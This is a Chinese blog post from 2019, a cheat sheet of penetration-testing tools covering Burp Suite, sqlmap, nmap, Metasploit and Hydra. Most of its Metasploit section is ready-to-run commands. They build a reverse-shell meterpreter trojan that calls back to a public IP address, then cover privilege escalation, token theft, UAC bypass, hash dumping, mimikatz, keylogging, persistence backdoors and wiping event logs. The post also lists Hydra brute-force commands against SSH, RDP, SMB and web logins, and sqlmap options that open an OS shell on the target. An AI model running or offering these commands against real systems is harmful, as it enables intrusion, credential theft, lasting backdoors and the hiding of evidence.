<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>常用渗透工具 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="web测试常用工具整理:一.burpsuite1.Macros模块:project-&gt;macros爆破数字验证码:https:&#x2F;&#x2F;blog.csdn.net&#x2F;d_pokemon&#x2F;article&#x2F;details&#x2F;78194351  2.intruder模块四种攻击方式: 1234Sniper(单字典顺序爆破):常用battering ram(单字典赋予所有变量取相同值)pitchfork(双字">
<meta property="og:type" content="article">
<meta property="og:title" content="常用渗透工具">
<meta property="og:url" content="http://example.com/2019/03/16/%E5%B8%B8%E7%94%A8%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="web测试常用工具整理:一.burpsuite1.Macros模块:project-&gt;macros爆破数字验证码:https:&#x2F;&#x2F;blog.csdn.net&#x2F;d_pokemon&#x2F;article&#x2F;details&#x2F;78194351  2.intruder模块四种攻击方式: 1234Sniper(单字典顺序爆破):常用battering ram(单字典赋予所有变量取相同值)pitchfork(双字">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2019-03-16T08:58:09.000Z">
<meta property="article:modified_time" content="2019-03-21T08:39:15.808Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="常用工具及使用">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-常用渗透工具" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/03/16/%E5%B8%B8%E7%94%A8%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/" class="article-date">
  <time datetime="2019-03-16T08:58:09.000Z" itemprop="datePublished">2019-03-16</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      常用渗透工具
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="web测试常用工具整理"><a href="#web测试常用工具整理" class="headerlink" title="web测试常用工具整理:"></a>web测试常用工具整理:</h3><h3 id="一-burpsuite"><a href="#一-burpsuite" class="headerlink" title="一.burpsuite"></a>一.burpsuite</h3><p>1.Macros模块:project-&gt;macros爆破数字验证码:<a target="_blank" rel="noopener" href="https://blog.csdn.net/d_pokemon/article/details/78194351">https://blog.csdn.net/d_pokemon/article/details/78194351</a></p>
<p> 2.intruder模块四种攻击方式:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Sniper(单字典顺序爆破):常用</span><br><span class="line">battering ram(单字典赋予所有变量取相同值)</span><br><span class="line">pitchfork(双字典同时顺序爆破)</span><br><span class="line">cluster bomb(多字典混合爆破).常用***</span><br></pre></td></tr></table></figure>

<p>3.Proxy代理功能:User options-&gt;socks proxy</p>
<p>参考:<a target="_blank" rel="noopener" href="https://blog.csdn.net/snert/article/details/49749757(%E7%88%86%E7%A0%B4%E6%95%B0%E5%AD%97%E9%AA%8C%E8%AF%81%E7%A0%81%E8%AE%B2%E8%A7%A3)">https://blog.csdn.net/snert/article/details/49749757(爆破数字验证码讲解)</a><br>    <a target="_blank" rel="noopener" href="https://blog.csdn.net/xiaohua_de/article/details/80290882(%E7%88%86%E7%A0%B4%E6%96%B9%E5%BC%8F%E5%9B%BE%E8%A7%A3)">https://blog.csdn.net/xiaohua_de/article/details/80290882(爆破方式图解)</a></p>
<h3 id="二-sqlmap参数"><a href="#二-sqlmap参数" class="headerlink" title="二.sqlmap参数"></a>二.sqlmap参数</h3><table>
<thead>
<tr>
<th align="left">命令</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>-u &quot;地址&quot;</code></td>
<td>指定存在注入的url</td>
</tr>
<tr>
<td align="left"><code>--dbms</code></td>
<td>指定数据库类型</td>
</tr>
<tr>
<td align="left"><code>--dbms-cred=DBMS.</code>&nbsp;&nbsp;&nbsp;</td>
<td>数据库的认证,例子:–dbms-cred=”name:password”</td>
</tr>
<tr>
<td align="left"><code>--dbs</code></td>
<td>搜索所有库</td>
</tr>
<tr>
<td align="left"><code>-D</code></td>
<td>指定某个数据库</td>
</tr>
<tr>
<td align="left"><code>-table</code></td>
<td>搜索所有表</td>
</tr>
<tr>
<td align="left"><code>-T</code></td>
<td>指定某个表</td>
</tr>
<tr>
<td align="left"><code>-column</code></td>
<td>搜搜所有字段</td>
</tr>
<tr>
<td align="left"><code>-C</code></td>
<td>指定某个字段</td>
</tr>
<tr>
<td align="left"><code>-dump</code></td>
<td>提取当前数据</td>
</tr>
<tr>
<td align="left"><code>-v</code></td>
<td>显示信息[1-6]</td>
</tr>
<tr>
<td align="left"><code>--users</code></td>
<td>查询一共都有哪些用户，常用，直接用–users</td>
</tr>
<tr>
<td align="left"><code>--passwords</code></td>
<td>查询用户密码的哈希，常用，直接用–passwords</td>
</tr>
<tr>
<td align="left"><code>--privileges</code></td>
<td>查看特权，常用。例 –privileges -U username (CU 就是当前用户)</td>
</tr>
<tr>
<td align="left"><code>--method=</code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
<td>指定提交方式—-例子–method=GET –method=POST</td>
</tr>
<tr>
<td align="left"><code>–proxy</code></td>
<td>使用代理,例子</td>
</tr>
<tr>
<td align="left"><code>–prefix</code></td>
<td>增加前缀,例子</td>
</tr>
<tr>
<td align="left"><code>--suffix</code></td>
<td>增加后缀</td>
</tr>
<tr>
<td align="left"><code>--level</code></td>
<td>设置测试的等级[1-5],默认1</td>
</tr>
<tr>
<td align="left"><code>--technique=TECH</code>&nbsp;&nbsp;&nbsp;</td>
<td>指定所使用的技术（B:布尔盲注;E:报错注入;U:联合查询注入;S:文件系统，操作系统，注册表相关注入;T:时间盲注; 默认全部使用）</td>
</tr>
<tr>
<td align="left"><code>--time-sec=TIMESEC</code>&nbsp;&nbsp;</td>
<td>在基于时间的盲注的时候，指定判断的时间，单位秒，默认5秒。</td>
</tr>
<tr>
<td align="left"><code>--dns-domain=DNS..</code></td>
<td>如果你控制了一台dns服务器，使用这个可以提高效率,例子:–dns-domain 123.com</td>
</tr>
</tbody></table>
<blockquote>
<p>高级:</p>
<p><code> --tamper &quot;*.py&quot;</code>:使用绕过脚本<br>    —-例子:charencode.py/charunicodeencode.py:重要*****</p>
<p><code>--cookie</code>:指定cookie值:重要<br>    —-例子:-u “<a target="_blank" rel="noopener" href="http://www.abc.com/index.php?id=1&quot;">www.abc.com/index.php?id=1&quot;</a> –cookie=”a=1;b=2”</p>
<p><code>--user-agent</code>:指定user-agent内容</p>
<p><code>--host</code>:指定host内容</p>
<p><code>--referer</code>:指定referer</p>
<p><code>-H --headers</code> 额外的header头:重要<br>        —-例子:–headers=”host:<a target="_blank" rel="noopener" href="http://www.a.com/nUser-Agent:yuangh&quot;">www.a.com\nUser-Agent:yuangh&quot;</a></p>
<p><code>--ignore-proxy</code> 无视本地的代理</p>
<p><code>--ignore-redirects</code> 无视http重定向，比如登录成功会跳转到其他网页，可使用这个忽略掉。</p>
<p><code>--timeout=TIMEOUT</code> 请求超时的时间，单位为秒，浮点数，默认30s。</p>
<p><code>-f</code>:指纹信息，返回DBMS，操作系统，架构，补丁等信息。</p>
<p><code>–tor :-tor-port</code>:手动设置TOR代理，</p>
<p><code>-tor-type</code>:检查你的代理是否被正确地安装并正常的工作<br>        —-安装:sudo apt-get install tor tor-geoip<br>        —-举例:进入sqlmap的目录后:./sqlmap.py -u “<a target="_blank" rel="noopener" href="http://www.targetvuln.com/index/php?cata_id=1&quot;">http://www.targetvuln.com/index/php?cata_id=1&quot;</a> -b -a -tor </p>
<p><code>–check-tor–user-agent</code>=”Mozilla/5.0(compatible;Googlebot/2.1;+<a target="_blank" rel="noopener" href="http://www.google.com/bot.html)&quot;">http://www.google.com/bot.html)&quot;</a></p>
<p>shell</p>
<p> <code>--os-cmd=OSCMD</code> 执行一句系统命令。<br>        —-举例:–os-shell=”ipconfig -all”</p>
<p><code>--os-shell</code> 创建一个对方操作系统的shell，远程执行系统命令</p>
<p><code>--priv-esc</code> 自动提权，数据库进程用户权限提升。</p>
<p><code>--msf-path=MSFPATH Metasploit Framework</code>本地的安装路径。</p>
<p><code>--tmp-path=TMPPATH</code> 远程临时文件目录的绝对路径。</p>
<p><code>--reg-add</code> 添加一个注册表。</p>
<p><code>--reg-del</code> 删一个注册表。</p>
<p><code>--wizard</code> 新手教程。</p>
</blockquote>
<h3 id="三-nmap"><a href="#三-nmap" class="headerlink" title="三.nmap"></a>三.nmap</h3><p>最常用</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td><code>-p1-65535 </code>  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
<td>扫描指定端口</td>
</tr>
<tr>
<td><code> -p2,3,4</code></td>
<td>10.0.1.161   -p20-200,7777,8888 指定不连续端口</td>
</tr>
<tr>
<td><code>-sU udp</code></td>
<td>端口扫描 扫描完6万个端口需要20分钟左右</td>
</tr>
<tr>
<td><code>-Pn</code></td>
<td>不对目标进行ping探测（不判断主机是否在线）（直接扫描端口）</td>
</tr>
<tr>
<td><code>-V</code></td>
<td>详细信息</td>
</tr>
<tr>
<td><code>-A</code></td>
<td>操作系统和版本信息</td>
</tr>
<tr>
<td><code>-O</code></td>
<td>检测操作系统</td>
</tr>
<tr>
<td><code>-sA</code></td>
<td>探测是否使用了防火墙 –例子:All 1680 scanned ports on server2.tecmint.com (192.168.0.101) are UNfiltered</td>
</tr>
<tr>
<td><code>-sP</code></td>
<td>仅探测是否在线</td>
</tr>
<tr>
<td><code>-sT/sU/sS   </code></td>
<td>TCP/UDP/半开放扫描</td>
</tr>
<tr>
<td><code>-sL</code></td>
<td>(Idlescan)使用另外一个目标网络的主机发送数据包.隐藏自己ip:重要****</td>
</tr>
<tr>
<td><code>--iflist</code></td>
<td>检测主机接口和路由信息:重要****</td>
</tr>
<tr>
<td><code>-iL</code></td>
<td>指定ip文件</td>
</tr>
<tr>
<td><code>-F</code></td>
<td>快速扫描，仅扫描列在nmap-services文件中的端口而避开所有其它的端口。</td>
</tr>
<tr>
<td><code>-r</code></td>
<td>顺序端口扫描(扫所有端口)</td>
</tr>
</tbody></table>
<p>​    常用</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td><code>, - </code></td>
<td>用空格或-或,-例子:nmap 10.0.1.161  10.0.1.162   nmap 10.0.1.161-162     nmap 10.0.1.161,162</td>
</tr>
<tr>
<td><code>10.0.3.0/24</code></td>
<td>nmap  10.0.3.0/24</td>
</tr>
<tr>
<td><code>--exclude</code></td>
<td>排除某个ip</td>
</tr>
<tr>
<td>—-例子</td>
<td>排除连续ip:nmap 10.0.1.161-162  –exclude 10.0.1.162</td>
</tr>
<tr>
<td>—-例子</td>
<td>排除多个ip:nmap 10.0.1.161-163 –exclude 10.0.1.162-163</td>
</tr>
<tr>
<td>—-例子</td>
<td>排除不连续ip:nmap 10.0.1.161-163 –exclude 10.0.1.161,10.0.1.163</td>
</tr>
<tr>
<td>—-例子</td>
<td>排除文件内ip:nmap 10.0.1.161-163  –excludefile ex.txt</td>
</tr>
<tr>
<td><code>-sF-sX-sN</code></td>
<td>秘密FIN数据包扫描、圣诞树(XmasTree)、空(Null)扫描模式：即使SYN扫描都无法确定的情况下使用**</td>
</tr>
<tr>
<td><code>-bFTP</code></td>
<td>反弹攻击(bounceattack)**</td>
</tr>
</tbody></table>
<p>端口状态:</p>
<table>
<thead>
<tr>
<th align="center">命令</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td align="center">open</td>
<td>应用程序在该端口接收 TCP 连接或者 UDP 报文。</td>
</tr>
<tr>
<td align="center">closed</td>
<td>关闭的端口对于nmap也是可访问的， 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。</td>
</tr>
<tr>
<td align="center">filtered</td>
<td>由于包过滤阻止探测报文到达端口，nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由规则 或者主机上的软件防火墙。</td>
</tr>
<tr>
<td align="center">unfiltered</td>
<td>未被过滤状态意味着端口可访问，但是nmap无法确定它是开放还是关闭。 只有用于映射防火墙规则集的 ACK 扫描才会把端口分类到这个状态。</td>
</tr>
<tr>
<td align="center">open</td>
<td>filtered</td>
</tr>
<tr>
<td align="center">closed</td>
<td>filtered</td>
</tr>
</tbody></table>
<p>参考文档:<a target="_blank" rel="noopener" href="https://jingyan.baidu.com/article/47a29f24312010c0142399f1.html%E6%B7%B1%E5%BA%A6%E5%89%96%E6%9E%90%E4%BA%86nmap">https://jingyan.baidu.com/article/47a29f24312010c0142399f1.html深度剖析了nmap</a></p>
<h3 id="四-MSF"><a href="#四-MSF" class="headerlink" title="四.MSF"></a>四.MSF</h3><p>​    </p>
<ul>
<li><p>1.生成windows下的exe反弹木马<br>  msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe &gt; 8888.exe</p>
<pre><code>        // -p &lt; payload &gt; -f &lt; format&gt; -o &lt; path&gt; = &gt;</code></pre>
</li>
<li><p>生成linux的反弹elf木马</p>
<p>  msf5 &gt; use payload/linux/x64/meterpreter/reverse_tcp<br>  msf5 payload(linux/x64/meterpreter/reverse_tcp) &gt; set lhost 192.168.5.187<br>  msf5 payload(linux/x64/meterpreter/reverse_tcp) &gt; set lport 20000<br>  msf5 payload(linux/x64/meterpreter/reverse_tcp) &gt; generate -h<br>  generate -f elf -o ~/Desktop/centos.elf</p>
</li>
<li><p>2.监听<br>  use exploit/multi/handler</p>
<pre><code>        set PAYLOAD windows/meterpreter/reverse_tcp
        set LHOST 172.17.150.246 //阿里云云服务器这里是内网ip
        set LPORT 8888
        exploit -j</code></pre>
</li>
<li><p>3.内网代理    首先需要链接sessions,在此基础下添加路由<br>  meterpreter &gt; run get_local_subnets //获取网段</p>
<pre><code>        meterpreter &gt; run autoroute -s 172.2.175.0/24 //添加路由
        meterpreter &gt; run autoroute -p //查看路由
        meterpreter &gt; run autoroute -d -s 172.2.175.0 //删除网段
        meterpreter &gt; run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探测该网段下的存活主机。
        meterpreter &gt; background //后台sessions</code></pre>
</li>
<li><p>4.提权<br>  (1)getsystem</p>
<pre><code>        meterpreter &gt; getsystem //直getsystem提权，最常用简单的办法
        (2)使用exp提权
        meterpreter &gt; background //先后台运行会话
        [*] Backgrounding session 1…
        msf &gt; use post/windows/escalate/ms10_073_kbdlayout
        msf &gt; show options
        msf &gt; set session 1 //设置要使用的会话
        msf post(ms10_073_kbdlayout) &gt; exploit
        注意：如果创建了一个system进程，就可以立马sessions 1进入会话，然后ps查看进程，使用migrate pid注入到进程。
        或者直接：
        meterpreter &gt; run post/windows/escalate/ms10_073_kbdlayout
        (3)盗取令牌
        meterpreter &gt; use incognito //进入这个模块
        meterpreter &gt; list_tokens –u //查看存在的令牌
        meterpreter &gt; impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列，getuid查看，两个斜杠
        (4)过UAC
        msf &gt; use exploit/windows/local/bypassuac //32位与64位一样，其他几个模块也一样
        msf &gt; show options
        msf &gt; set session 4
        msf &gt; run //成功后会返回一个新的session，进入新会话，发现权限没变，使用getsystem即可完成提权
        (5)Hash
        meterpreter &gt; run post/windows/gather/smart_hashdump //读取hash这种做法最智能，效果最好。</code></pre>
</li>
<li><p>5.留后门<br>(1)服务留后门：</p>
<pre><code>          meterpreter &gt; run metsvc -A //再开起一个终端，进入msfconsole
          msf &gt; use exploit/multi/handler //新终端中监听
          msf &gt; set payload windows/metsvc_bind_tcp
          msf &gt; set LPORT 31337
          msf &gt; set RHOST 192.168.0.128
          msf &gt; run //获取到的会话是system权限
      (2)启动项后门：
          meterpreter &gt; run persistence -X -i 10 -p 6666 -r 192.168.71.105</code></pre>
<p>​        // -X 系统开机自启，-i 10 10秒重连一次，-p 监听端口，-r 监听机。直接监听就好了，他自己会链接回来。</p>
<p>​        <code>注意到移除 persistence 后门的办法是删除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注册表键和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。 ​        缺点：容易被杀毒软件杀 。</code></p>
</li>
<li><p>6.爆破ssh<br> use auxiliary/scanner/ssh/ssh_login</p>
<pre><code>   set rhosts 7.7.7.20
   set username root
   set pass_file /root/pass.txt //加载字典，可以收集密码做字典
   set threads 50
   run</code></pre>
</li>
<li><p>7.nmap扫描基本信息<br> msf &gt; nmap –script=vuln 受害靶机ip地址</p>
<pre><code>   msf &gt; nmap –script=mysql-info 192.168.0.4 //扫描mysql数据库信息 版本 等..</code></pre>
</li>
<li><p>8.清除记录<br> msf &gt; clearev //删除目标机上的应用程序、系统和安全日志。</p>
</li>
</ul>
<p>  MSF常用命令：</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td>截图</td>
<td><code>screenshot</code></td>
</tr>
<tr>
<td>查看是否是虚拟机</td>
<td><code>run checkvm</code></td>
</tr>
<tr>
<td>查看运行木马的用户</td>
<td><code>getuid</code></td>
</tr>
<tr>
<td>注入到进程</td>
<td><code>migrate pid</code> //成功会提示successfully</td>
</tr>
<tr>
<td>加载mimikatz模块</td>
<td><code>meterpreter &gt; load mimikatz meterpreter &gt; wdigest </code>//需要system权限</td>
</tr>
<tr>
<td>获取键盘记录</td>
<td><code>meterpreter&gt; run post/windows/capture/keylog_recorder</code> //运行键盘记录模块，他自己创建本文。</td>
</tr>
</tbody></table>
<p>msf部分取自：<a target="_blank" rel="noopener" href="http://www.cnblogs.com/hookjoy/p/7989715.html">http://www.cnblogs.com/hookjoy/p/7989715.html</a>        </p>
<h3 id="五Hydra"><a href="#五Hydra" class="headerlink" title="五Hydra"></a>五Hydra</h3><table>
<thead>
<tr>
<th>参数</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>-R</td>
<td>根据上一次进度继续破解</td>
</tr>
<tr>
<td>-S</td>
<td>使用SSL协议连接</td>
</tr>
<tr>
<td>-s</td>
<td>指定端口</td>
</tr>
<tr>
<td>-l</td>
<td>指定用户名</td>
</tr>
<tr>
<td>-L</td>
<td>指定用户名字典(文件)</td>
</tr>
<tr>
<td>-p</td>
<td>指定密码破解</td>
</tr>
<tr>
<td>-P</td>
<td>指定密码字典(文件)</td>
</tr>
<tr>
<td>-e</td>
<td>空密码探测和指定用户密码探测(ns)</td>
</tr>
<tr>
<td>-C</td>
<td>用户名可以用:分割(username:password)可以代替-l username -p password</td>
</tr>
<tr>
<td>-o</td>
<td>输出文件</td>
</tr>
<tr>
<td>-t</td>
<td>指定多线程数量，默认为16个线程</td>
</tr>
<tr>
<td>-vV</td>
<td>显示详细过程</td>
</tr>
<tr>
<td>-f</td>
<td>一旦破解成功就停止</td>
</tr>
</tbody></table>
<p>实例：</p>
<table>
<thead>
<tr>
<th>目的</th>
<th>实例</th>
</tr>
</thead>
<tbody><tr>
<td>破解ssh的密码</td>
<td>hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh</td>
</tr>
<tr>
<td>破解https</td>
<td>hydra -m /index.php -l username -P pass.txt IP https</td>
</tr>
<tr>
<td>破解smb</td>
<td>hydra -l administrator -P pass.txt IP smb</td>
</tr>
<tr>
<td>破解rdp</td>
<td>hydra IP rdp -l administrator -P pass.txt -V</td>
</tr>
<tr>
<td>破解http-proxy</td>
<td>hydra -l admin -P pass.txt http-proxy://10.36.16.18</td>
</tr>
<tr>
<td>破解telnet</td>
<td>hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V</td>
</tr>
<tr>
<td>破解ftp1</td>
<td>hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV</td>
</tr>
<tr>
<td>破解ftp2</td>
<td>hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV</td>
</tr>
<tr>
<td>get方式提交，破解web登录1</td>
<td>hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/</td>
</tr>
<tr>
<td>get方式提交，破解web登录2</td>
<td>hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php`</td>
</tr>
<tr>
<td>post方式提交，破解web登录1</td>
<td>hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form</td>
</tr>
<tr>
<td>post方式提交，破解web登录2</td>
<td>index.php:name=^USER^&amp;pwd=^PASS^:<code>&lt;title&gt;invalido&lt;/title&gt;</code></td>
</tr>
</tbody></table>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2019/03/16/%E5%B8%B8%E7%94%A8%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/" data-id="ckngvj77j001lzkv22wk67ua5" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7%E5%8F%8A%E4%BD%BF%E7%94%A8/" rel="tag">常用工具及使用</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/03/24/%E5%9F%9F%E6%B8%97%E9%80%8F/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          域渗透
        
      </div>
    </a>
  
  
    <a href="/2019/03/10/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E5%B7%A5%E5%85%B7/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">内网穿透工具</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/docker-api-php-registry/" rel="tag">docker-api,php,registry</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/information-collect/" rel="tag">information collect</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/k8s/" rel="tag">k8s</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/linux%E5%91%BD%E4%BB%A4%E4%B9%8B%E6%9F%A5%E6%89%BE/" rel="tag">linux命令之查找</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python-%E6%89%AB%E6%8F%8F/" rel="tag">python 扫描</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/redis%E6%BC%8F%E6%B4%9E-%E4%B8%80%E8%88%AC%E5%86%85%E7%BD%91%EF%BC%89/" rel="tag">redis漏洞(一般内网）</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shell-%E8%84%9A%E6%9C%AC-Linux-search/" rel="tag">shell 脚本 Linux search</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shell%E5%8F%8D%E5%BC%B9%E3%80%81powershell%E5%8F%8D%E5%BC%B9/" rel="tag">shell反弹、powershell反弹</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql-inject/" rel="tag">sql_inject</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag">sql注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql%E6%B3%A8%E5%85%A5%E6%B5%81%E7%A8%8B/" rel="tag">sql注入流程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/windows-%E5%9F%9F-%E5%9F%9F%E6%B8%97%E9%80%8F/" rel="tag">windows 域 域渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91-%E6%8F%90%E6%9D%83/" rel="tag">内网/提权</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91/" rel="tag">内网转发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7%E5%8F%8A%E4%BD%BF%E7%94%A8/" rel="tag">常用工具及使用</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag">文件上传</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" rel="tag">文件包含漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%BF%87waf/" rel="tag">过waf</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/docker-api-php-registry/" style="font-size: 10px;">docker-api,php,registry</a> <a href="/tags/information-collect/" style="font-size: 10px;">information collect</a> <a href="/tags/k8s/" style="font-size: 10px;">k8s</a> <a href="/tags/linux%E5%91%BD%E4%BB%A4%E4%B9%8B%E6%9F%A5%E6%89%BE/" style="font-size: 10px;">linux命令之查找</a> <a href="/tags/python-%E6%89%AB%E6%8F%8F/" style="font-size: 10px;">python 扫描</a> <a href="/tags/redis%E6%BC%8F%E6%B4%9E-%E4%B8%80%E8%88%AC%E5%86%85%E7%BD%91%EF%BC%89/" style="font-size: 10px;">redis漏洞(一般内网）</a> <a href="/tags/shell-%E8%84%9A%E6%9C%AC-Linux-search/" style="font-size: 10px;">shell 脚本 Linux search</a> <a href="/tags/shell%E5%8F%8D%E5%BC%B9%E3%80%81powershell%E5%8F%8D%E5%BC%B9/" style="font-size: 10px;">shell反弹、powershell反弹</a> <a href="/tags/sql-inject/" style="font-size: 10px;">sql_inject</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">sql注入</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5%E6%B5%81%E7%A8%8B/" style="font-size: 10px;">sql注入流程</a> <a href="/tags/windows-%E5%9F%9F-%E5%9F%9F%E6%B8%97%E9%80%8F/" style="font-size: 10px;">windows 域 域渗透</a> <a href="/tags/%E5%86%85%E7%BD%91-%E6%8F%90%E6%9D%83/" style="font-size: 10px;">内网/提权</a> <a href="/tags/%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91/" style="font-size: 10px;">内网转发</a> <a href="/tags/%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7%E5%8F%8A%E4%BD%BF%E7%94%A8/" style="font-size: 10px;">常用工具及使用</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 10px;">文件上传</a> <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">文件包含漏洞</a> <a href="/tags/%E8%BF%87waf/" style="font-size: 10px;">过waf</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/02/">February 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/12/">December 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/11/23/k8s%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">k8s搭建</a>
          </li>
        
          <li>
            <a href="/2019/03/31/python%E6%89%B9%E9%87%8F%E7%88%AC%E5%8F%96URL%E9%85%8D%E5%90%88AWVS/">python批量爬取URL配合AWVS</a>
          </li>
        
          <li>
            <a href="/2019/03/24/first-shell/">first shell</a>
          </li>
        
          <li>
            <a href="/2019/03/24/docker-api/">php与docker-api与私有仓库</a>
          </li>
        
          <li>
            <a href="/2019/03/24/%E5%9F%9F%E6%B8%97%E9%80%8F/">域渗透</a>
          </li>
        
      </ul>
    </div>
  </div>

  
